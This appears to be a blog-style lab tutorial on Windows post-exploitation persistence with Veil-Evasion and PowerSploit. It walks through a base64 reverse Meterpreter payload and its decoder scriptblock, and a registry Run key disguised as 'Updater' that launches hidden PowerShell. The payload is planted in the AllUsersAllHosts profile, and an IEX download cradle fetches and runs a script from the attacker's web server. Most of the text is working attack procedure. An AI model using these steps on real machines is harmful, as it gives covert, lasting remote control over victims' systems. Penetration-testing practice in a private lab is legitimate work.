This document provides a step-by-step guide to creating persistence with PowerSploit and the Veil Framework. It begins by using Veil-Evasion to generate a reverse Meterpreter payload, then extracts the base64 encoded payload to use in a PowerSploit persistence script. PowerSploit is used to generate a persistence script that will execute the payload and send a reverse shell to the attacker whenever a user logs into the victim machine. It also provides an alternative manual method using PowerShell commands directly without the PowerSploit script.

1. How to create Persistence with PowerSploit and the Veil
Framework.
Author:​ Haydn Johnson
Original Content:
https://www.fishnetsecurity.com/6labs/blog/how­post­ex­persistence­scripting­powersploit­veil
Reason:​ Due to the new updates in PowerSploit I wanted to give persistence a try. Also the
write­up above skips some steps assuming a more knowledgeable audience. There is a simple
change in the Persistence Module syntax and as a result I wanted to write this blog. This also
acts as detailed notes for myself to come back too.
What you will learn: ​This blog gives a step by step guide to creating persistence with
PowerSploit. A reverse shell will be sent to the attacker when a victim logs into their machine.
Assumptions:
The Veil Framework is installed on a Kali Linux machine.
PowerSploit has been downloaded to a windows machine.
Basic knowledge on Windows and Unix.
Basic understanding of Metasploit, reverse shells etc.
Ability to have a connection between Victim and Attacking machines (Vbox/Vmware).
The IP addresses that your systems have will most likely be different as I did not create a
standard Virtualbox Host only network, please make adjustments to anything you follow.
Please note:
● The victim machine is used to create the powershell persistence file with PowerSploit,
and that is used to infect the victim (same machines).
○ Ideally, the script would be created on a non­victim machine as a secondary
attacking machine. The persistence script would then be executed on a victim
machine.
Links:
PowerSploit: ​https://github.com/PowerShellMafia/PowerSploit
Veil­Framework:​https://www.veil­framework.com/
Lab used for this:
VirtualBox Virtualization software
Kali Linux 2.0
Windows 7

2. To give an understanding of the environment the below information is given:
Veil Evasion is installed on the Kali Machine:
PowerSploit is saved on the Victim Machine:
The ip address for the Attacking machine is:
The ip address for the Victim machine is:

3. High Level Steps:
1. Create Payload with Veil
2. Separate the required code for the PowerSploit Persistence Script
3. Use PowerSploit to create the Persistence Script
4. Setup a Listener to catch the Payload
5. Execute the Persistence Script
6. Test the Persistence works
I have also included a ‘manual’ way to do this using the key commands PowerSploit uses, as
well as using an IEX cradle to download and execute the script remotely.
Creating the Payload:
The first step is to create a payload.
We want the victim system to do something when the persistence happens, in this case we are
going to create a reverse Meterpreter shell to be sent to the attacking machine. We will use the
veil­evasion framework create the Meterpreter shell.
The veil­evasion framework will create a bat file that launches a base64 encoded meterpreter,
we will use the base64 encoding as part of the powersploit script to create persistence.
Run Veil­Evasion:

4. You should be greeted with this screen:
Create a powershell/meterpreter/rev_https payload:
type ‘use 22’ and the options for the payload will be shown:
Ensure the correct payload is selected.

5. Set the options with the correct IP address (the Attacking machine):
Type ‘info’ to confirm the correct IP address has been chosen:
Type ‘generate’ to create the payload:
Veil gives two output files:
The ‘Payload file’ will be used in the PowerSploit Script.
The ‘Handler file’ will be used to create a listener for the reverse shell.
The payload has now been created.

6. Getting the correct code to use from the payload:
We have the payload created in the correct format being Base64. However it is also a batch file
so that it executes as a batch file, this tutorial does not use the batch file, so it will show how to
get the code ready in order to create the persistence script.
Browse and open the ‘Payload File’
This ‘Payload File’ is a batch file that can be run in windows to create our shell. There are 2
encoded payloads here. We are going to use the first one.
Highlight the first encoded payload and copy and paste it into a text file on its own:
This ensures that the whole payload is used
PLEASE NOTE:
● The last character ‘’ is supposedly bas64, but for some reason (maybe to do with how
PowerShell executes it) it creates an error when PowerShell attempts to execute the
command.
○ This issue shows itself when the persistence executes.
● Please remove it:

7.
Reminder: remove the last backslash
This is the bas64 payload that will be used in the following steps. Move this over to the Victim
machine.
On the Victim Machine:
We have to create the persistence script using powersploit. This involves importing the
persistence module, adding the relevant information needed, including the payload and
persistence options.
Importing PowerSploit Persistence Module:
type ‘Import­Module .Persistence
This has imported the module, giving access to the Persistence functionality.

8. Adding the Persistence options:
Powersploit has different persistence options, we are going to use it to execute our shell upon
logon for an administrator and a normal user:
We will use the Add­Persistence cmdlet to create the persistence script, its options are:
The first variable (scriptblock) is going to read in our base64 encoded payload. We will use the
following format:
$p = {iex $(New­Object IO.StreamReader ($(New­Object IO.Compression.DeflateStream
($(New­Object IO.MemoryStream
(,$([Convert]::FromBase64String("​VEIL_PAYLOAD_HERE​")))),
[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()}
Use a text file and copy and paste the base64 payload into it. You should end up with a text file
combing the above command with the VEIL_PAYLOAD_HERE section replaced with the base
64 encoding. Such as the below:

9. Copy and paste this into PowerShell:
Then echo the variable to confirm it has been created:
The scriptblock is saved as a variable, now set the UserPersistenceOption and
ElevatedPersistenceOption to the execute when the user logs on:
To do this, create two variables like below and place into a text file:
$u = New­UserPersistenceOption ­Registry –AtLogon
$e = New­ElevatedPersistenceOption ­Registry –AtLogon
Copy and paste each command (1 by 1) into PowerShell:

10. Echo the variables to ensure they have been created:
This has set the variables needed for the Add­Persistence cmdlet to create the persistence
script.
Create the Persistence Script
Use the Add­Persistence cmdlet to generate the script.
The following code will be used:
‘Add­Persistence ­ScriptBlock $p ­ElevatedPersistenceOption $e ­Verbose
­UserPersistenceOption $u ­PassThru’
As shown:

11.
The script has been created.
Confirm the persistence script has been created. A persistence and remove persistence script
should be in the folder that you ran the command.
The Persistence command creates the persistence and the removePersistence script removes it
(as in, it sets back the changes the persistence script made).

12. Back to the Attacking Machine
Create the Listener for our payload:
In order to receive the payload on our Attacking machine, we must have a listener setup to
catch the reverse shell.
Navigate in Kali Linux to the location of the handler file:
Open the file in a text editor, as it will be used to create the lister.
Launch Metasploit in a terminal:
‘service postgresql start’
‘msfconsole’
Copy and paste the commands from the handler file into the msfconsole terminal:

13.
Confirm the listener is set up:
type ‘jobs’
Now the listener is setup, lets go back to the victim machine and run our persistence script.
Back to the Victim machine
Create the persistence:
As we have the Persistence script created, we simply need to run it.
Your persistence is created (the changes selected have been made to the victim machine).

14. Confirm the persistence works
You can log back in and out, and your should receive a shell.
Another easy way to check is to relaunch powershell. This should send you a shell. This works
because the command to execute the shell is run when powershell executes, the command is
saved in the AllusersAllhosts profile.
To see the AllUsersAllHosts profile:
Echo $profile.AllUsers.AllHosts to find the location and then view the file.

15. Persistence Not Using The PowerSploit Script
Having a look at the Persistence Script created by PowerSploit, you can deduce the main
commands used to create the persistence. Albeit without the ability to easily add the options you
want. This is smaller and quicker if you're in a hurry.
Create the registry item to launch PowerShell upon any user logging on:
The peristence chosen, is to edit the registry so that as a user logs on it launches
powershell.exe.
Execute the following code in PowerShell:
New­ItemProperty ­Path HKLM:SoftwareMicrosoftWindowsCurrentVersionRun ­Name
Updater ­PropertyType String ­Value
"`"$($Env:SystemRoot)System32WindowsPowerShellv1.0powershell.exe`" ­NonInteractive
­WindowStyle Hidden"
If you wish to confirm this has worked, you are able to look it up in the registry:
Under:
HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUN
called updater

16.
<TO ADD: Get­item propery regesitry location>
Add the PAYLOAD to the AllUsersAllHosts profile:
When the user logs on, powershell.exe will execute with a default profile. The below will show
how to set that profile for All users.
Use the below code to add the code to the AllUserAllHosts profile:
echo "sal a New­Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.M
emoryStream][Convert]::FromBase64String('​BASE 64 ENCODED
PAYLOAD​'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).
ReadToEnd()" | Out­File $PROFILE.AllUsersAllHosts ­Fo

17. Persistence with an IEX cradle
The idea of using an IEX cradle is that if you have remote access you can host your
‘persistence’ script and use powershell to download it and run it in memory. This is to emulate a
live attack, this allows you to practice on your own.
Using the above knowledge (from PowerSploit), we use 2 commands to create persistence:
1. Setting the registry to launch powershell upon logon
2. setting the default profile to send us a shell
1 ­
New­ItemProperty ­Path HKLM:SoftwareMicrosoftWindowsCurrentVersionRun ­Name
Updater ­PropertyType String ­Value
"`"$($Env:SystemRoot)System32WindowsPowerShellv1.0powershell.exe`" ­NonInteractive
­WindowStyle Hidden"
2­
echo "sal a New­Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.M
emoryStream][Convert]::FromBase64String('​BASE 64 ENCODED
PAYLOAD​'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).
ReadToEnd()" | Out­File $PROFILE.AllUsersAllHosts ­Fo

18. Create the Persistence Script
Similar to batch, a PowerShell script execute commands line by line. As a result we simply copy
and paste the 2 commands in a .ps1 file and host on our Kali machine.
Host the Script on the Attacking Machine
PLEASE NOTE:
● I did a lot of testing and you may run into issues if you create the script then move it over
to a Linux machine. There are formatting errors when simply moving the file to linux.

19. ● You will see the following formatting error:
● Instead, open the file on windows and copy paste it into a file in Linux.
The victim needs to be able to download the script, so it will be hosted on the Attacker machine.
Copy the file into the /var/www/html directory on Kali Linux 2.
Start Apache in Kali:
‘service apache2 start’
Ensure you can access the script hosted on Kali:
If unable to access chmod 777 it:

20. Use the IEX cradle to download and run the remote script:
Use the code below linking to your script to allow the victim to download and execute the script:
IEX (New­Object Net.WebClient).DownloadString('​http://192.168.0.3/persistence_test3.ps1​')
Test the persistence works
Have your Listener ready on Kali and Reboot
Launch your Victim machine, login

21.
You should receive a shell when you login to the victim machine
Those are the steps for using the IEX cradle.